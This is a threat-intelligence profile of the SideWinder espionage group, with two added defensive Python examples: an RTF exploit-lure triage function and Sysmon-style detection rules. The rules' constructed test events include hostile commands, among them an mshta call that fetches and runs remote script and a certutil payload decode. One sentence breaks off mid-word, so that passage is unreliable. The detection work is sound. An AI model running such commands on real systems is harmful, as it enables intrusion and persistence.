SideWinder is a sophisticated advanced persistent threat (APT) group, active since at least 2012 and widely attributed to Indian state-sponsored actors because of its focus on regional rivals and its geopolitical lures tied to India-Pakistan tensions. The group specializes in cyber espionage, stealing sensitive data from government, military, and critical infrastructure sectors. Also tracked as Rattlesnake and T-APT-10, SideWinder relies on modular malware toolkits, exploits for long-patched Office vulnerabilities, and evolving delivery mechanisms such as ClickOnce applications. By late 2025 the group had intensified campaigns against South Asian entities, adding server-side polymorphism and sector-specific targeting in the maritime, logistics, and nuclear domains, while keeping detection rates low through obfuscation and abuse of legitimate, signed software.
Key Activities
SideWinder’s operations emphasize multi-stage intrusions with tailored spear-phishing, often leveraging current events for relevance. Notable 2025 campaigns include:
• May 2025 Public Sector Attacks: Spear-phishing with malicious Word and RTF documents exploiting CVE-2017-0199 (Office OLE object handling, remote code execution) and CVE-2017-11882 (Equation Editor memory corruption), followed by multistage loaders, shellcode payloads, and DLL sideloading for persistent access and data exfiltration. Both vulnerabilities were patched in 2017, so a successful detonation indicates an unpatched or legacy Office installation rather than a zero-day.
• March–September 2025 ClickOnce Campaign: Four waves of phishing emails carrying fake PDFs and Word documents (e.g., lures on the “India-Pakistan Conflict” or ministry credentials) whose embedded buttons prompt the recipient to install an “Adobe Reader update”; the button downloads a legitimately signed ClickOnce application that sideloads a malicious DLL and deploys .NET-based stealers.
• Ongoing 2025 Sector Expansions: Systematic targeting of critical infrastructure with updated toolsets, including credential hooking, browser token theft, and Telegram-based exfiltration; campaigns feature geofenced payloads and dynamic C2 paths for evasion.
• Broader Patterns: Use of batch scripts for payload orchestration, artifact cleanup, and UAC bypasses; integration of Python stealers for file collection and WMI for system reconnaissance.
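The two Office exploits named in the May 2025 campaign leave recognisable static traces in RTF lures: CVE-2017-0199 documents carry an OLE link object marked `\objupdate` so the link is refreshed (and the remote payload fetched) on open, while CVE-2017-11882 documents embed an Equation Editor object. The triage function below is an added example written for this page, not SideWinder code or any vendor's detection; the sample RTF fragments are constructed for illustration and the OLE1 class names it looks for (`OLE2Link`, `Equation.3`) are the ones commonly seen in such lures, not a guarantee of exploitation.

```python
import re

# Little-endian byte layout of the Equation Editor (EQNEDT32) CLSID
# {0002CE02-0000-0000-C000-000000000046}, as it appears inside OLE data.
EQUATION_CLSID_LE = bytes.fromhex("02ce02000000000000c000000000000046")

# \*\objdata payloads are hex-encoded and are often split across lines.
_OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9a-fA-F\s]+)")


def _objdata_blobs(rtf: bytes):
    """Yield the decoded OLE blob of every \\*\\objdata group in the RTF."""
    for m in _OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s", b"", m.group(1))
        if len(hexstr) % 2:          # tolerate a truncated trailing nibble
            hexstr = hexstr[:-1]
        try:
            yield bytes.fromhex(hexstr.decode("ascii"))
        except ValueError:
            continue


def triage_rtf(rtf: bytes) -> dict:
    """Heuristic static triage of an RTF for the two OLE abuse patterns above.

    Returns boolean indicators plus human-readable reasons. It is a pre-filter
    for sandboxing or analyst review, not proof that the file exploits anything.
    """
    reasons = []
    header_ok = rtf.lstrip().startswith(b"{\\rt")  # Word also accepts '{\rt'
    if not header_ok:
        reasons.append("file does not start with an RTF header")
    objupdate = b"\\objupdate" in rtf
    if objupdate:
        reasons.append("\\objupdate refreshes the OLE link on open (CVE-2017-0199 pattern)")
    equation = bool(re.search(rb"\\objclass\s*Equation", rtf, re.I))
    ole2link = False
    for blob in _objdata_blobs(rtf):
        if EQUATION_CLSID_LE in blob or b"Equation.3" in blob:
            equation = True
        if b"OLE2Link" in blob:
            ole2link = True
    if equation:
        reasons.append("embedded object is Equation Editor (CVE-2017-11882 pattern)")
    if ole2link:
        reasons.append("OLE1 class name 'OLE2Link' in objdata (typical CVE-2017-0199 lure)")
    return {
        "rtf_header": header_ok,
        "objupdate": objupdate,
        "equation_editor": equation,
        "ole2link": ole2link,
        "embedded_objects": len(re.findall(rb"\\object\b", rtf)),
        "reasons": reasons,
    }


# Constructed samples (not real malware). OLE1 header = version 01050000,
# format 02000000, class-name length, then the class name with a NUL.
SAMPLE_0199 = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\rsltpict"
    b"{\\*\\objclass Word.Document.8}"
    b"{\\*\\objdata 0105000002000000090000004f4c45324c696e6b00}}}"
)
SAMPLE_11882 = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}"
    b"{\\*\\objdata 01050000020000000b000000\n4571756174696f6e2e3300\n00000000}}}"
)
SAMPLE_BENIGN = b"{\\rtf1\\ansi Quarterly report, nothing embedded.}"

if __name__ == "__main__":
    for name, sample in (("0199", SAMPLE_0199), ("11882", SAMPLE_11882), ("benign", SAMPLE_BENIGN)):
        result = triage_rtf(sample)
        print(name, result["reasons"] or ["no indicators"])
```

The `\objclass` check alone is not enough: attackers routinely omit or mislabel the class string, which is why the function also decodes `\objdata` and matches the Equation Editor CLSID and OLE1 class name inside the blob. RTF control words can additionally be obfuscated with stray whitespace and braces, so treat a clean result as "not obviously malicious", not as "safe".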
These activities reflect a shift toward broader infrastructure risk, but the intent remains espionage: as of November 2025 no disruptive impact on the targeted infrastructure had been confirmed.
Targets
SideWinder’s espionage efforts are geopolitically driven, prioritizing intelligence on regional adversaries:
• Core Focus: High-level government institutions in Pakistan (e.g., Ministry of Defense), Bangladesh (e.g., foreign affairs), and Sri Lanka (e.g., Central Bank, Army battalions, ministries of finance and foreign affairs).
• Expanded Scope (2025): Maritime and logistics firms, nuclear power facilities in South Asia; diplomatic entities like European embassies in New Delhi; occasional hits on financial and military sectors across Asia, Africa, and Europe. Victims are selected for strategic value, with lures mimicking official correspondence to high-profile officials.
Tools and Tactics
The group favors a mix of custom implants, modified open-source tools, and abuse of legitimate binaries for stealth:
• Initial Access: Spear-phishing attachments (RTF/DOCX with Office exploits) or links to credential phishers mimicking services like Zimbra; PDF buttons for ClickOnce downloads.
• Execution/Persistence: Windows scripting (cmd.exe, PowerShell, mshta.exe, VBScript) for shellcode injection; scheduled tasks that re-run the payload every 2–10 minutes, plus autostart folders; batch files (e.g., a.bat, which decodes staged payloads with certutil and a XOR pass).
• Defense Evasion: DLL sideloading (e.g., ReaderConfiguration.exe with DEVOBJ.dll), UPX packing, XOR obfuscation (key “N
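The execution, persistence and evasion behaviours listed above (certutil decoding from a batch file, short-interval scheduled tasks, mshta pulling script content, and a system-named DLL such as DEVOBJ.dll loaded from the application's own directory) all surface in ordinary endpoint telemetry. The rules below are an added detection example written for this page, not SideWinder tooling or any vendor's signatures. The events are constructed Sysmon-style records (event id 1 = process creation, 7 = image load); the field names, the sample paths and the `SYSTEM_DLLS` list are assumptions for illustration and should be mapped onto your own telemetry schema.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (not real telemetry). Field names are an
# assumption for this example; adapt them to your sensor's schema.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil -decode C:\Users\Public\a.txt C:\Users\Public\a.dat"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks /create /sc minute /mo 5 /tn "AdobeUpdater" '
                     r"/tr C:\Users\Public\ReaderConfiguration.exe /f"},
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"mshta http://203.0.113.10/update.hta"},
    {"id": 7, "image": r"C:\Users\Public\ReaderConfiguration.exe",
     "image_loaded": r"C:\Users\Public\DEVOBJ.dll", "signed": "false"},
    # Benign controls: the real devobj.dll from System32, and a daily task.
    {"id": 7, "image": r"C:\Windows\System32\svchost.exe",
     "image_loaded": r"C:\Windows\System32\devobj.dll", "signed": "true"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"schtasks /create /sc daily /tn Backup /tr backup.exe"},
]

# DLLs that normally live in System32. A copy beside an application binary is
# the classic sideloading shape. Illustrative list, extend from your baseline.
SYSTEM_DLLS = {"devobj.dll", "version.dll", "cryptbase.dll"}

_SCHTASKS_MINUTE_RE = re.compile(r"/sc\s+minute(?:\s+/mo\s+(\d+))?", re.I)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def rule_certutil_decode(ev):
    """certutil used as a decoder/downloader (the a.bat certutil stage)."""
    if ev["id"] != 1 or _basename(ev["image"]) != "certutil.exe":
        return None
    if re.search(r"(?:^|\s)[-/](?:decode|decodehex|urlcache)\b", ev["command_line"], re.I):
        return "certutil used to decode or download a payload"
    return None


def rule_fast_scheduled_task(ev, max_minutes=10):
    """schtasks creating a task that repeats every few minutes."""
    if ev["id"] != 1 or _basename(ev["image"]) != "schtasks.exe":
        return None
    m = _SCHTASKS_MINUTE_RE.search(ev["command_line"])
    if not m:
        return None
    interval = int(m.group(1)) if m.group(1) else 1  # /mo defaults to 1
    if interval <= max_minutes:
        return f"scheduled task repeats every {interval} min"
    return None


def rule_mshta_remote(ev):
    """mshta executing remote or inline script content."""
    if ev["id"] != 1 or _basename(ev["image"]) != "mshta.exe":
        return None
    if re.search(r"https?://|javascript:|vbscript:", ev["command_line"], re.I):
        return "mshta executing remote or inline script content"
    return None


def rule_dll_sideload(ev):
    """A system-named DLL loaded from the loading process's own directory."""
    if ev["id"] != 7:
        return None
    dll = PureWindowsPath(ev["image_loaded"])
    if dll.name.lower() not in SYSTEM_DLLS:
        return None
    dll_dir = str(dll.parent).lower()
    if dll_dir.startswith(r"c:\windows"):
        return None  # loaded from the OS directory, expected
    exe = PureWindowsPath(ev["image"])
    if str(exe.parent).lower() == dll_dir:
        return f"{exe.name} loaded system-named {dll.name} from its own directory"
    return None


RULES = (rule_certutil_decode, rule_fast_scheduled_task, rule_mshta_remote, rule_dll_sideload)


def detect(events):
    """Return [(rule_name, reason, event)] for every rule that fires."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((rule.__name__, reason, ev))
    return hits


if __name__ == "__main__":
    for name, reason, ev in detect(EVENTS):
        print(f"[{name}] {reason}: {ev.get('command_line') or ev.get('image_loaded')}")
```

The sideloading rule deliberately keys on the DLL's name and location rather than on its signature alone: SideWinder's loaders sit next to a legitimately signed host binary, so the executable itself looks clean and the anomaly is a System32-named DLL resolving from a user-writable directory. Tune `max_minutes` to your environment; the 2–10 minute cadence above is what the page reports, but legitimate software does occasionally schedule itself that tightly.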